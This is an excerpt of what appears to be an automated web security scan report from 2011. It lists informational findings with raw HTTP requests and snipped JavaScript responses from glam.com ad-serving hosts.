HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000036879 X-Glam-Euid: 4e601faf039d7bb33507 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:03:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:03:01 GMT Content-Length: 5020 Connection: close ...[SNIP]... '511'); GlamAdaptSetInfo('region GlamAdaptSetInfo( GlamAdaptSetInfo('city', 'WASHINGTON'); GlamAdaptSetInfo('bw', '5000'); /* Served by [rsapp107/172.30.0.116] for [www30a2.glam.com] at [Mon Jun 13 2011 4:03:01 PDT] */ document.write('<IFRAME SRC=\"http://ad ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d398cadfb255eaeb565 X-Glam-Bdata: XGlamBData,nbt,ls,rs X-Glam-AdId: 5000036879 X-Glam-Euid: 09bdd73895bd38039187 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 13 Jun 2011 11:13:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 13 Jun 2011 11:13:14 GMT Content-Length: 5753 Connection: close ...[SNIP]... qc=2692;qc=2690;qc=1771 var vars = glam_affiliate_vars.split fo ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www24a.glam.com |
Path: | /appdir/resources |
GET /appdir/resources Host: www24a.glam.com Proxy-Connection: keep-alive Referer: http://sportdfw.com/2011 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11523213055 |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/x-javascript Last-Modified: Thu, 06 Jan 2011 23:52:24 GMT Server: Jetty(6.1.21) Vary: Accept-Encoding Content-Length: 38 Cache-Control: public, max-age=377034 Date: Mon, 13 Jun 2011 11:02:09 GMT Connection: close if (window.Atako)Atako |